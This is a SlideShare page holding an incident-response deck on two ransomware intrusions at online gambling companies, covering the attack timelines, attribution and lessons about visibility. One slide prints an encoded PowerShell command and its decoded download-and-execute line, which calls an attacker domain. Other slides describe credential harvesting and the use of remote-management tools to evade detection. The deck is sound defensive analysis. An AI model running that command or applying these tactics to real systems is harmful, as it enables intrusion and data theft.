SlideShare a Scribd company logo

Insert coin to continue - Ransomware in the gaming industry.pdf

S
Stefano Maccaglia

This deck premiered at Black Hat in Las Vegas in August. He explains two cases referring to the world of online gaming, in particular betting and online casinos. These companies show two faces, on the one hand a great competence and attention to the quality of the code and the security of their portals, but they do not seem to be sensitive to the application of the same level of controls for what concerns their staff. As always the devil is in the details and the ransomware gangs know it well.

Presentations & Public Speaking
1 of 41
Download to read offline
©2022 NetWitness or its affiliates. All rights reserved. "Insert coin to continue... " Ransomware in the gaming industry Stefano Maccaglia Practice Manager, Incident Response
Who I Am: Stefano • I am the Practice Manager of the Netwitness (RSA) Incident Response. • I began my ICT career in 1997 in Digital Corp, but I started to crack software in 1985 with a Commodore C64. • I decided to get out of the cracking scene in 2000 to focus on networking… until Nimda and Blaster came out and cybersecurity became an interesting career… • I worked on the offensive side until 2009 when I jumped into the IR bandwagon. • Since then, I lead engagements around the world covering investigation about sophisticated actors.
Agenda ❑ Introduction ❑ The first case ❑ Initial Compromise ❑ Second Phase, Second Actor ❑ Third Phase ❑ Ransomware in play ❑ The outcome ❑ The second case ❑ Exotic Lily + Conti… ❑ Enablers of compromise ❑ Lesson learned
©2022 NetWitness or its affiliates. All rights reserved. The First Case
Initial Compromise ▪ Through an active exploit of the Exchange Web Server, two webshells were uploaded to DC1- EXCH01 on December 9, 2021. DC1-EXCH00 DC1-EXCH01 MUNICH Data Center 23.183.81.113 Logout.aspx iisstart.aspx The Exchange server version was 2019 CU10
Evidence of Initial Attack ▪ The proximity in the file creation (a few milliseconds apart) in different paths, confirm the webshells were dropped through an exploit with chained payloads. ▪ Web logs retention on the server was 30 days, so the logs rolled out before the investigation started, but the webshells were likely uploaded via the exploit CVE-2021-42321, an RCE, based on the folders used to drop them. First Webshell Basic loader Second Webshell with functions to interact with files Timestomped dates
CVE-2021-42321 in action ▪ The remote code execution vulnerability is due to issues with the validation of command-let (cmdlet) arguments. ▪ In order to exploit this flaw, an attacker would need to be authenticated. The attack requires execution of 4 POSTs in a chain against Exchange with an authenticated user to be successful.
We never leaked credentials… ▪ The attacker authenticated by leveraging on leaked credentials of a subcontractor working as developer in the environment. Yeah that account is mine, but it is a personal account… what it’s the meaning of this?... And how you collect it???
Logout.aspx Webshell ▪ This webshell is extremely simple, it call the IIS Worker process (w3wp.exe) to spawn the Command Processor, which, in turn, launches PowerShell (powershell.exe or pwsh.exe). "cmd.exe" /c powershell -ep bypass -e SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3 RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk= IEX (New-Object Net.WebClient).downloadstring('http://www.kuniptikiky.info/p?e') DECODED
Webshell Logic of iisstarts.aspx ▪ The second webshell allows the attacker to interact with the system through requests containing the parameter cadataKey. ▪ If the cadataKey parameter is not specified, the web shell performs a redirection to the errorFE.aspx page, returning a HTTP 404 code. • The web shell included the ability to run arbitrary commands and upload, delete, and view the contents of files. • Once implanted, the webshell was allowing the attacker to access the environment with local administration rights. All commands specified through this parameter are executed through an eval statement.
©2022 NetWitness or its affiliates. All rights reserved. Second Phase, Second Actor
Second Phase, Second Actor ▪ On February 18, 2022, the attacker uploaded a file named lsass.dll to the DC1-EXCH00 and few minutes later to DC1-EXCH01. ▪ This malicious file is loaded into processes and harvests clear text passwords in real time as various users authenticate with the Exchange server. DC1-EXCH00 DC1-EXCH01 MUNICH Data Center 23.183.81.113 iisstart.aspx lsass.dll iisstart.aspx This long pause between the initial webshells and the subsequent activity could be due to the initial attacker selling access to the Ransomware attacker.
Second Phase, Second Actor ▪ The harvested credentials are saved into a file named: ▪ Hundreds of clear text credentials passwords were harvested. ▪ This file was subsequently uploaded to several other servers, including several domain controllers. DC1-EXCH00 DC1-EXCH01 MUNICH Data Center iisstart.aspx lsass.dll iisstart.aspx C:windowstemptmpQWER.tmp User Pass C:windowstemptmpQWER.tmp. User Pass The DLL uses the NPLogonNotify API provided by Microsoft to extract cleartext credentials of users as they log into the servers
Second Phase, Second Actor ▪ The attacker also uploaded the first instance of the ATERA agent and Splashtop (a Remote Desktop software) on DC1-EXCH00 on 18 February 2022. DC1-EXCH00 DC1-EXCH01 MUNICH Data Center 23.183.81.113 iisstart.aspx atera.exe iisstart.aspx Atera is an IT management solution that enables monitoring, management, and automation of IT networks from a single console. lsass.dll
How to Avoid Generic Detection: Atera ▪ The idea behind this tactic is to leverage a legitimate remote management agents (like Atera) to survive possible Cobalt Strike detections from the EDR and Antivirus platforms. ▪ Relying upon a legitimate tool to achieve persistence is typically a Pen Tester approach and in my personal perspective this can clarify the attacker background.
atera.exe How to Complete the Job… ▪ The attacker then resumed activity on 11 March 2022. DC1-EXCH00 DC1-DC0001 MUNICH Data Center 23.183.81.113 Webshell lsass.dll atera.exe lsass.dll The Atera package was uploaded on the Domain Controller of the targeted Data Center (DC1-DC0001) together with the credential dumper “lsass.exe”.
How to Complete the Job… ▪ On March 23, the attacker uploaded lsass.dll to the DC1-EXCH01: DC1-EXCH00 DC1-EXCH01 MUNICH Data Center 23.183.81.113 iisstart.aspx lsass.dll iisstart.aspx He immediately started the credential harvesting on this system.
Third Phase: 23 March – 5 April ▪ During this period attacker moved laterally to various systems, including Domain Controllers, Backup servers, etc. ▪ Scanning and reconnaissance on the network were executed regularly. DC1-DC0001 DC1-EXCH00 lsass.dll lsass.dll iisstart.aspx atera.exe During these scanning the attacker identified the virtual infrastructure where critical servers were operating. Scanning Workstations Dev Systems Virtual Infrastructure MUNICH Data Center MUNICH Office
atera.exe Third Phase: Exfiltration DC1-DC0001 DC1-EXCH00 lsass.dll lsass.dll iisstart.aspx atera.exe DC3-SPORS2 MUNICH Data Center TORONTO Data Center 195.149.87.179 Leaks Leaks MUNICH Office ▪ There is evidence that the attacker stole various files during this time.
Status ▪ Ok, we reached this point… it’s April 6, the attacker owns the place and in less than 24 hours he collected about 12,45 Gb of data from the environment including lots of payment and betting details. ▪ Unfortunately, up to this point, the attacker was able to work undetected. Why? ▪ To answer we should clarify the meaning and the role of an “Enabler of Compromise,” but let’s see how the attack unfolded...
©2022 NetWitness or its affiliates. All rights reserved. Ransomware in Play
RDP + PSExec Ransomware distribution Ransomware in Play… 6 April 2022 The attacker executed a massive dissemination of the ransomware executable with a combination of RDPs and PsExec sessions. DC1-DC0001 lsass.dll atera.exe Workstations Dev Systems Virtual Infrastructure MUNICH Data Center MUNICH Office TORONTO Data Center MACAU Data Center
Ransomware in Play… ▪ With a separated and tailored action, the attacker ensured the backup servers of the company were encrypted, by leveraging another variant of the ransomware. ▪ This variant was also used against the company ESXi servers (about 50 hosts), which adversely affected around 2000 virtual machines hosted in them. ▪ The ransomware file that the attacker deployed to the ESXi servers was named “32app”. ▪ The version affecting all the other hosts was named “bet9je_com_alpha_encrypt_app.exe”.
Virtual Server Encryption ▪ The attacker appears to have infected the ESXi servers manually via SSH connections to them. DC1-DC0001 Virtual Infrastructure MUNICH Data Center atera.exe Ransomware Distribution via SSH Sessions Backup Infrastructure Ransomware installed manually
What we found: Network Forensics ▪ During the attack, the actor kept three systems untouched, in particular the Exchange server. atera.exe DC1-EXCH00 MUNICH Data Center TORONTO Data Center DC1-EXCH10 DC3-SPORS2 ▪ This is due probably to the goal of keeping an eye upon the target. ▪ In fact, the victim email system was still working despite the encryption of the remaining systems…
The Outcome ▪ It took 45 days to get rid of the whole infection, but it took five days to recover basic services allowing the company to slowly get back to business. ▪ From the end-users perspective the attack was a significant blow to the company’s reputation and, at least initially, it impacted on the overall relationship with the company’s customer base. ▪ However, the gaming world has its own rules and 45 days later, it was like business as normal in the company headquarters… apart for some minor, but meaningful details: ▪ Enhanced network visibility ▪ New staff for daily monitoring of network and infrastructures… ▪ No Splashtop, Teamviewer or Anydesk connections ▪ No scripts with hardcoded credentials ▪ New cybersecurity procedures
©2022 NetWitness or its affiliates. All rights reserved. The Second Case
The second case: introduction ▪ This case targeted a group operating on the online casino sector with about 2.500 employees. ▪ The company has two data centers located in Australia and Hong Kong and operates mainly in the Asian-Pacific market. ▪ The cybersecurity practice inside the Company at the time was mainly managed by one global MSSP and one local provider. ▪ Again, privacy is a mandatory requirement for an online casino and the company was applying strong controls upon online services and data privacy. ▪ However, they left open several holes in their cybersecurity ecosystem… Total lack of Network visibility both internally and in the Company Private Cloud Lack of organized logs and limited endpoint visibility Lack of any behavior analysis at user level for internal staff Limited investigative and reactive capabilities Real-time Threat detection limited to “low hanging fruits”. Lots of enablers of compromise… Lack of proper escalation plan for ICT incidents
Attack Preparation ▪ The attack was organized around a flow very similar to the first case presented, with the difference that the attacker this time targeted the staff with domain spoofing and spear-phishing. Upload payload sharing it with target Send a file sharing notification Register “company.us” to spoof “company.co.au” Create employee@company.us email account Acquire target’s email through OSINT and send a phishing email Send a sounding email discussing business and meetings Online File-sharing Service Victim Attacker
Initial Compromise ▪ The attacker sent an email mimicking a contractor and asking for feedback on a service architecture. ▪ The email was asking to set a time for a call the following week about the content of the email. MUNICH Data Center 44.227.65.245 Attacker
BazarLoader Exotic Lily + Conti in Action Domain Spoofing Spear-Phishing Campaign Initial Compromise and Recon Cobalt Strike write, execute Exotic Lily Download additional tools Perform command-line recon Harvest local and network credentials Lateral Movement Powershell RDP: Splashtop, Anydesk Stolen VPN and Admin Credentials CONTI RDP toward DCs Atera Package Application Servers Exotic Lily C2 Leaks SSL Sessions to C2
No Doubt on Attribution… It was absolutely easy to attribute the attack to the Conti Ransomware Gang, their banner was speaking for themselves:
©2022 NetWitness or its affiliates. All rights reserved. Enablers of Compromise
Enablers of Compromise ▪ An enabler of compromise is an exploitable condition that could lead to a faster or wider expansion of the radius and the magnitude of the attack. ▪ Typical enablers of compromise are legacy protocols, such as SMBv1, Telnet, TFTP, etc… These protocols, if exploited, could grant significant advantages to the attacker. ▪ Other traditional enablers are shared local administrative accounts, guessable credentials, unpatched public web servers or unauthenticated network shares. ▪ Nowadays, during targeted attacks, the attacker could use a myriad of tools and techniques to breach an organization’s network, steal sensitive information and compromise its operations. ▪ Vulnerable endpoints, legacy protocols and careless users represent three enablers to successful cyber attacks. An enabler of compromise is a pre-existing condition to the attack.
Script with Hardcoded Credentials We found cron script /root/inventory_queries.sh on a critical repository containing login credentials hardcoded, as illustrated here: Also, we found cron jobs running under the root user that had a service account, including the password, in cleartext.
Enablers of compromise or careless users??? Unreported Teamviewer and Anydesk usage. During the analysis we found several systems connected to the company network with TeamViewer and Anydesk remote control software installed. The presence of remote control software in systems connected to the network may provide additional access points that bypass existing security measures Cracked software During the analysis we found evidence of systems using cracked Windows licenses. Powershell scripts with cleartext credentials Reviewing the network, we found several PowerShell scripts containing cleartext credentials. Root password in root’s .bash_history Reviewing the logs regarding the usage of Unix systems we stumbled upon another significant Enabler of Compromise… You can notice here…
©2022 NetWitness or its affiliates. All rights reserved. Lessons Learned
C O N F I D E N T I A L It’s all about visibility… and a clean environment… ▪ The sophisticated nature of today’s threat landscape and actors continue to wreak havoc on enterprise infrastructures, to our surprise, this occurs upon betting and online casino services more than expected. ▪ Visibility is the key to protecting a network by actively looking for any security gap, vulnerability, on-going cyber attack, and any anomaly or wrong usage of network resources. ▪ The rule is “If you don’t find them, you can’t fix them”. ▪ Unfortunately, visibility is a major issue in the gaming industry. ▪ There could be several reasons why this is the case – the gaming industry may not understand the importance of network visibility, for example, or lack the tools and resources to get started. ▪ In any case, the lack of adequate response from security teams is due to the dependency on parameter-based security solutions that are not agile enough to deal with sophisticated threats or is due to the limited spectrum of cybersecurity controls these companies enforce nowadays.
Visibility, Flexibility and Practice Comprehensive Visibility Preparedness Incident Response Retainer Major Incident Practice Drills Cyber Insurance Recovery Planning Preparedness Proactive Detection and Response Reactive Capabilities
©2022 NetWitness or its affiliates. All rights reserved. THANKS! C O N F I D E N T I A L
See Everything. Fear Nothing.

Recommended

自宅サーバラックの勧め ~In osc nagoya~
自宅サーバラックの勧め ~In osc nagoya~自宅サーバラックの勧め ~In osc nagoya~
自宅サーバラックの勧め ~In osc nagoya~h-otter
 
マスタリングTCP/IP ニフクラ編
マスタリングTCP/IP ニフクラ編マスタリングTCP/IP ニフクラ編
マスタリングTCP/IP ニフクラ編富士通クラウドテクノロジーズ株式会社
 
PCCC22:日本AMD株式会社 テーマ1「第4世代AMD EPYC™ プロセッサー (Genoa) の概要」
PCCC22:日本AMD株式会社 テーマ1「第4世代AMD EPYC™ プロセッサー (Genoa) の概要」PCCC22:日本AMD株式会社 テーマ1「第4世代AMD EPYC™ プロセッサー (Genoa) の概要」
PCCC22:日本AMD株式会社 テーマ1「第4世代AMD EPYC™ プロセッサー (Genoa) の概要」PC Cluster Consortium
 
GPU Container as a Serviceを実現するための最新OSS徹底比較 - OpenStack最新情報セミナー 2017年7月
GPU Container as a Serviceを実現するための最新OSS徹底比較 - OpenStack最新情報セミナー 2017年7月GPU Container as a Serviceを実現するための最新OSS徹底比較 - OpenStack最新情報セミナー 2017年7月
GPU Container as a Serviceを実現するための最新OSS徹底比較 - OpenStack最新情報セミナー 2017年7月VirtualTech Japan Inc.
 
グリー株式会社『私たちが GCP を使い始めた本当の理由』第 9 回 Google Cloud INSIDE Game & Apps
グリー株式会社『私たちが GCP を使い始めた本当の理由』第 9 回 Google Cloud INSIDE Game & Appsグリー株式会社『私たちが GCP を使い始めた本当の理由』第 9 回 Google Cloud INSIDE Game & Apps
グリー株式会社『私たちが GCP を使い始めた本当の理由』第 9 回 Google Cloud INSIDE Game & AppsGoogle Cloud Platform - Japan
 
今日から始めるDigitalOcean
今日から始めるDigitalOcean今日から始めるDigitalOcean
今日から始めるDigitalOceanMasahito Zembutsu
 
Biometrics Authentication Using Raspberry Pi
Biometrics Authentication Using Raspberry PiBiometrics Authentication Using Raspberry Pi
Biometrics Authentication Using Raspberry PiIJTET Journal
 
Stop the Guessing: Performance Methodologies for Production Systems
Stop the Guessing: Performance Methodologies for Production SystemsStop the Guessing: Performance Methodologies for Production Systems
Stop the Guessing: Performance Methodologies for Production SystemsBrendan Gregg
 

Recommended

自宅サーバラックの勧め ~In osc nagoya~
自宅サーバラックの勧め ~In osc nagoya~自宅サーバラックの勧め ~In osc nagoya~
自宅サーバラックの勧め ~In osc nagoya~h-otter
 
マスタリングTCP/IP ニフクラ編
マスタリングTCP/IP ニフクラ編マスタリングTCP/IP ニフクラ編
マスタリングTCP/IP ニフクラ編富士通クラウドテクノロジーズ株式会社
 
PCCC22:日本AMD株式会社 テーマ1「第4世代AMD EPYC™ プロセッサー (Genoa) の概要」
PCCC22:日本AMD株式会社 テーマ1「第4世代AMD EPYC™ プロセッサー (Genoa) の概要」PCCC22:日本AMD株式会社 テーマ1「第4世代AMD EPYC™ プロセッサー (Genoa) の概要」
PCCC22:日本AMD株式会社 テーマ1「第4世代AMD EPYC™ プロセッサー (Genoa) の概要」PC Cluster Consortium
 
GPU Container as a Serviceを実現するための最新OSS徹底比較 - OpenStack最新情報セミナー 2017年7月
GPU Container as a Serviceを実現するための最新OSS徹底比較 - OpenStack最新情報セミナー 2017年7月GPU Container as a Serviceを実現するための最新OSS徹底比較 - OpenStack最新情報セミナー 2017年7月
GPU Container as a Serviceを実現するための最新OSS徹底比較 - OpenStack最新情報セミナー 2017年7月VirtualTech Japan Inc.
 
グリー株式会社『私たちが GCP を使い始めた本当の理由』第 9 回 Google Cloud INSIDE Game & Apps
グリー株式会社『私たちが GCP を使い始めた本当の理由』第 9 回 Google Cloud INSIDE Game & Appsグリー株式会社『私たちが GCP を使い始めた本当の理由』第 9 回 Google Cloud INSIDE Game & Apps
グリー株式会社『私たちが GCP を使い始めた本当の理由』第 9 回 Google Cloud INSIDE Game & AppsGoogle Cloud Platform - Japan
 
今日から始めるDigitalOcean
今日から始めるDigitalOcean今日から始めるDigitalOcean
今日から始めるDigitalOceanMasahito Zembutsu
 
Biometrics Authentication Using Raspberry Pi
Biometrics Authentication Using Raspberry PiBiometrics Authentication Using Raspberry Pi
Biometrics Authentication Using Raspberry PiIJTET Journal
 
Stop the Guessing: Performance Methodologies for Production Systems
Stop the Guessing: Performance Methodologies for Production SystemsStop the Guessing: Performance Methodologies for Production Systems
Stop the Guessing: Performance Methodologies for Production SystemsBrendan Gregg
 
Vpn
VpnVpn
VpnNure Alam
 
マイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKA
マイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKAマイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKA
マイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKAMurata Tatsuhiro
 
Linux Fundamental
Linux FundamentalLinux Fundamental
Linux FundamentalAnjar Hardiena
 
How Scylla Make Adding and Removing Nodes Faster and Safer
How Scylla Make Adding and Removing Nodes Faster and SaferHow Scylla Make Adding and Removing Nodes Faster and Safer
How Scylla Make Adding and Removing Nodes Faster and SaferScyllaDB
 
Accelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDS
Accelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDSAccelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDS
Accelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDSCeph Community
 
Monitoring with Ganglia
Monitoring with GangliaMonitoring with Ganglia
Monitoring with GangliaFastly
 
The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdf
The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdfThe-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdf
The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdfprasunkagrawal
 
Iptables in linux
Iptables in linuxIptables in linux
Iptables in linuxMandeep Singh
 
Network packet analysis -capture and Analysis
Network packet analysis -capture and AnalysisNetwork packet analysis -capture and Analysis
Network packet analysis -capture and AnalysisManjushree Mashal
 
systemdを始めよう
systemdを始めようsystemdを始めよう
systemdを始めようPreferred Networks
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriPRISMA CSI
 
Virtual Private Network main
Virtual Private Network mainVirtual Private Network main
Virtual Private Network mainKanika Gupta
 
Running Moodle for High Concurrent Users
Running Moodle for High Concurrent UsersRunning Moodle for High Concurrent Users
Running Moodle for High Concurrent UsersGLC Networks
 
openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料
openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料
openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料zgock
 
Chapter 7 Presentation
Chapter 7 PresentationChapter 7 Presentation
Chapter 7 PresentationAmy McMullin
 
Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-
Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-
Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-HidekiNishizawa
 
Deploying Splunk on OpenShift
Deploying Splunk on OpenShiftDeploying Splunk on OpenShift
Deploying Splunk on OpenShiftEric Gardner
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunterAndrew McNicol
 
光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415
光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415
光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415Interop Tokyo ShowNet NOC Team
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Disruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDisruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDebra Baker, CISSP CSSP
 

More Related Content

What's hot

マイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKA
マイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKAマイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKA
マイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKAMurata Tatsuhiro
 
How Scylla Make Adding and Removing Nodes Faster and Safer
How Scylla Make Adding and Removing Nodes Faster and SaferHow Scylla Make Adding and Removing Nodes Faster and Safer
How Scylla Make Adding and Removing Nodes Faster and SaferScyllaDB
 
Accelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDS
Accelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDSAccelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDS
Accelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDSCeph Community
 
Monitoring with Ganglia
Monitoring with GangliaMonitoring with Ganglia
Monitoring with GangliaFastly
 
The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdf
The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdfThe-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdf
The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdfprasunkagrawal
 
Network packet analysis -capture and Analysis
Network packet analysis -capture and AnalysisNetwork packet analysis -capture and Analysis
Network packet analysis -capture and AnalysisManjushree Mashal
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriPRISMA CSI
 
Virtual Private Network main
Virtual Private Network mainVirtual Private Network main
Virtual Private Network mainKanika Gupta
 
Running Moodle for High Concurrent Users
Running Moodle for High Concurrent UsersRunning Moodle for High Concurrent Users
Running Moodle for High Concurrent UsersGLC Networks
 
openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料
openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料
openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料zgock
 
Chapter 7 Presentation
Chapter 7 PresentationChapter 7 Presentation
Chapter 7 PresentationAmy McMullin
 
Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-
Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-
Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-HidekiNishizawa
 
Deploying Splunk on OpenShift
Deploying Splunk on OpenShiftDeploying Splunk on OpenShift
Deploying Splunk on OpenShiftEric Gardner
 
光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415
光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415
光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415Interop Tokyo ShowNet NOC Team
 

What's hot (20)

Vpn
VpnVpn
Vpn
 
マイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKA
マイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKAマイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKA
マイクロサービスの基盤として注目の「NGINX」最新情報 | 20180127 OSC2018 OSAKA
 
Linux Fundamental
Linux FundamentalLinux Fundamental
Linux Fundamental
 
How Scylla Make Adding and Removing Nodes Faster and Safer
How Scylla Make Adding and Removing Nodes Faster and SaferHow Scylla Make Adding and Removing Nodes Faster and Safer
How Scylla Make Adding and Removing Nodes Faster and Safer
 
Accelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDS
Accelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDSAccelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDS
Accelerating Cassandra Workloads on Ceph with All-Flash PCIE SSDS
 
Monitoring with Ganglia
Monitoring with GangliaMonitoring with Ganglia
Monitoring with Ganglia
 
The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdf
The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdfThe-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdf
The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdf
 
Iptables in linux
Iptables in linuxIptables in linux
Iptables in linux
 
Network packet analysis -capture and Analysis
Network packet analysis -capture and AnalysisNetwork packet analysis -capture and Analysis
Network packet analysis -capture and Analysis
 
systemdを始めよう
systemdを始めようsystemdを始めよう
systemdを始めよう
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
 
Virtual Private Network main
Virtual Private Network mainVirtual Private Network main
Virtual Private Network main
 
Running Moodle for High Concurrent Users
Running Moodle for High Concurrent UsersRunning Moodle for High Concurrent Users
Running Moodle for High Concurrent Users
 
openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料
openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料
openSUSEで最強仮想環境をつくろう - ゲーミングから仮想通貨まで - OSC名古屋2017セミナー資料
 
Chapter 7 Presentation
Chapter 7 PresentationChapter 7 Presentation
Chapter 7 Presentation
 
Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-
Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-
Telecom Infra Projectの取り組み -光伝送におけるハードとソフトの分離-
 
Deploying Splunk on OpenShift
Deploying Splunk on OpenShiftDeploying Splunk on OpenShift
Deploying Splunk on OpenShift
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunter
 
光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415
光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415
光が分離する論理トポロジーと伝送技術_Shownet2021 studio 20210415
 

Similar to Insert coin to continue - Ransomware in the gaming industry.pdf

Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Disruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDisruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDebra Baker, CISSP CSSP
 
DEFCON 23 - ionut popescu - net ripper
DEFCON 23 - ionut popescu - net ripperDEFCON 23 - ionut popescu - net ripper
DEFCON 23 - ionut popescu - net ripperFelipe Prado
 
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)Shah Sheikh
 
Duck Hunter - The return of autorun
Duck Hunter - The return of autorunDuck Hunter - The return of autorun
Duck Hunter - The return of autorunNimrod Levy
 
Nimrod duck hunter copy
Nimrod duck hunter copyNimrod duck hunter copy
Nimrod duck hunter copyNimrod Levy
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2ShapeBlue
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】Hacks in Taiwan (HITCON)
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.Jakub Kałużny
 
